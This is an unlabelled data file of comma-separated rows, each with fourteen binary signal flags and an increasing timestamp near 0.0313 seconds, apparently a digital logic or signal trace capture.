1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266652e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266676e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266700e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266724e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266752e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266776e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266804e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266828e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266852e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266876e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266900e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266924e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266952e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266976e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267004e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267028e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267052e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267076e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267100e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267124e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267152e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267176e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267204e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267228e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267252e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267276e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267300e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267324e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267352e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267376e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267404e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267428e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267452e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267476e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267500e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267524e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267552e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267576e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267604e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267628e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267652e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267676e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267700e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267724e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267752e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267776e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267804e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267828e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267852e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267876e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267900e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267924e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1267952e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1267976e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268004e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268028e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268052e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268076e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268100e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268124e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268152e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268176e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268204e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268228e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268252e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268276e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268300e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268324e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268352e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268376e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268404e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268428e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268452e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268476e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268500e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268524e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268552e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268576e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268604e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268628e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268652e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268676e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268700e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268724e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268752e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268776e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268804e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268828e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268852e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268876e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268900e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268924e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1268952e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1268976e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269004e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269028e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269052e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269076e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269100e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269124e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269152e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269176e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269204e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269228e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269252e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269276e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269300e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269324e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269352e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269376e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269404e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269428e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269452e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269476e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269500e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269524e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269552e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269576e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269604e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269628e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269652e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269676e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269700e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269724e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1269752e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1269776e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1394244e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1394440e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,3.1394460e-02 0,1,1,1,1,0,0,0,0,0,0,1,0,1,3.1394492e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,3.1394516e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,3.1394816e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,3.1394844e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,1,3.1394892e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,3.1394916e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,3.1394924e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,3.1394940e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,3.1394964e-02 0,1,1,1,1,0,0,0,0,1,0,0,0,1,3.1394968e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,3.1394972e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,1,3.1395012e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,3.1395040e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,1,3.1395044e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,3.1395048e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,3.1395064e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1395076e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395088e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1395092e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1395140e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1395164e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395172e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1395188e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395212e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1395220e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1395264e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1395292e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,3.1395296e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395300e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1395316e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395340e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1395364e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395388e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1395412e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395440e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1395492e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395516e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1395520e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1395564e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1395588e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395596e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1395612e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395640e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1395644e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1395692e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1395716e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395724e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1395740e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395764e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1395788e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395812e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1395840e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395864e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1395892e-02 0,1,1,1,1,0,0,0,0,1,0,0,0,0,3.1395916e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1395920e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1395964e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1395988e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1395996e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1396012e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396040e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1396044e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1396092e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1396116e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396124e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1396140e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396164e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1396188e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396212e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1396240e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396264e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1396316e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396340e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1396344e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1396388e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1396412e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396420e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1396440e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396464e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1396516e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396540e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1396564e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396592e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1396616e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396644e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1396668e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396692e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1396716e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396740e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1396748e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1396792e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1396816e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396824e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1396844e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396868e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1396892e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1396916e-02 0,1,1,1,1,0,0,0,0,1,0,0,0,0,3.1396920e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1396924e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1396968e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1396992e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,3.1396996e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1397000e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1397020e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1397044e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1397068e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1397092e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1397116e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1397140e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1397164e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1397192e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1397216e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1397244e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1397292e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1397316e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1397324e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1397368e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1397392e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1397416e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1397444e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1397468e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1397492e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1397516e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1397540e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1397548e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1397592e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1397616e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1397624e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1397644e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1397668e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1397672e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1397692e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1397716e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1397740e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1397764e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1397792e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1397816e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1397844e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1397868e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1397916e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1397940e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1397968e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1397992e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,3.1397996e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398000e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398016e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398044e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398068e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398092e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1398096e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1398140e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1398164e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398172e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398192e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398216e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398244e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398268e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398292e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398316e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398340e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398364e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398392e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398416e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398444e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398468e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398492e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398516e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398540e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398564e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398592e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398616e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398644e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398668e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398692e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398716e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398740e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398764e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398792e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398816e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398844e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398868e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398892e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398916e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398940e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1398964e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1398992e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399016e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399044e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399068e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399092e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399116e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399140e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399164e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399192e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399216e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399244e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399268e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399292e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399316e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399340e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399364e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399392e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399416e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399444e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399468e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399492e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399516e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399540e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399564e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399592e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399616e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399644e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399668e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399692e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399716e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399740e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399764e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399792e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399816e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399844e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399868e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399892e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399916e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399940e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1399964e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1399992e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400016e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400044e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400068e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400092e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400116e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400140e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400164e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400192e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400216e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400244e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400268e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400292e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400316e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400340e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400364e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400392e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400416e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400444e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400468e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400492e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400516e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400540e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400564e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400592e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400616e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400644e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400668e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400692e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400716e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400740e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400764e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400792e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400816e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400844e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400868e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400892e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400916e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400940e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1400964e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1400992e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1401016e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1401044e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1401068e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1401092e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1401116e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1401140e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1401164e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1401192e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1401216e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1401244e-02 